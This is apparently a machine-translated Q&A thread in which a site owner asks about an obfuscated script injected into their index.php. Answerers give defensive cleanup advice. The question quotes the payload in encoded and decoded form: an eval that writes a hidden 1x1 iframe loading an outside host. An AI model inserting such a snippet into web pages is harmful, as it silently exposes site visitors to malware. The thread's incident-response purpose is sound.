0

私のウェブサイトのindex.phpファイルは、以下のスクリプトの影響を受けています。このため、グーグルは私がアクセスすることを禁止されました。誰かが私にワットの種類の攻撃を教えてくださいこれはこれであり、解決策はありますか?

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

FWIW、上記のエンコードされていないバージョンは

eval(document.write('<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>'));

ありがとう、よろしく

tismon

4

3 に答える 3

1

次のように聞こえます: リンク テキスト

あなたが投稿した限られた情報から、あなたがそのサイトでなんらかのオープンソース ソフトウェアを実行していることはほぼ保証できます。また、現在の標準にパッチが適用されていない可能性があります。phpBB、Joomla (特に Joomla) phpMyAdmin、および Wordpress で発生するのを見てきました。それは恐ろしいほど一般的であり、99% の確率で、多くの人が考えているほど洗練されたものではありません。非常に古い Mambo のテスト インストールと phpBB の不正なインストールを行っているときに、IT スタッフの誰かがサーバーに忍び込んでファンタジー フットボール リーグと通信するということが起こりました。

問題は、ハッカーは怠け者だということです。彼らが本当に欲しいものを持っていない限り、彼らが行ってあなたを個別にハッキングする理由はありません.彼らの時間の価値はありません. ただし、悪用可能なコードベースで一般的なコードを実行している場合、サイトをランダムにスキャンし、穴を見つけると自動的に攻撃します。したがって、コードの内容と場所がほぼ常に同じになる理由です。

サイトを駐車してください...「工事中」ページを設置してください。コードを引き下げて、手動または自動でスクラブします。やめて!オープン ソース コードは、最新のものであってもすべて更新してください。パーミッション、SQL クエリ (特にエスケープされていない検索ボックス)、およびユーザー パーミッション システムのサニティ チェックを行うようになりました。スクリプト インジェクション テストを実行します。最後に、できる限りすべてクリアしたら、テスト、テスト、テストします。最後に、問題とはほとんど関係がないと考え、パスワードを変更し、適切なパスワード戦略を使用して保護してください。

幸運を。気をつけて!

于 2010-09-29T04:29:53.960 に答える
0

bpeterson76が言ったことだけでなく、:

システムで一般的なソフトウェアを実行していないことが事実である場合、特にファイルシステムへの書き込みをどこかで行っている場合は、最初に独自のスクリプトを確認します。しかし、Apacheのような古いサーバーソフトウェアや、セキュリティホールを露呈しているものもあります。データがファイルに追加されているため、SQLインジェクションではない可能性があります。

ホスティングに応じて、すべてのサーバーソフトウェアを更新するか、ホスティングプロバイダーに問い合わせてください。

ログはありますか?それらをよく見ると、穴が明らかになる可能性があります。共有ホスティングを使用している場合、一部の設定では、ファイルのアクセス許可が許可されていれば、他の顧客がファイルに書き込むことができます。

于 2010-09-29T04:51:37.950 に答える
0

私は実際、少し前に自分のサイトで同様の攻撃を受けました。まず、Web ルートの下のフォルダーをチェックして、関数にちなんで名付けられた php ファイルを探します。私のものはopendir、iswritableなどでした。これらのファイルには、base64でエンコードされたスクリプトがさらに表示されるはずです。そうでない場合は、無関係である可能性があります。いずれにせよ、podfer.com の who.is レコードにはいくつかの情報があります。その Web サイトのホスティング会社に連絡して、CSS 攻撃を開始していることを伝えてください。問題なくシャットダウンできるはずです。私はそのように私と一緒に働いたハッカーを手に入れました。

また、Mosso/rackspace を使用している場合は、アクセスしてファイルのアクセス許可を強化する必要があります。

于 2010-09-29T05:12:31.123 に答える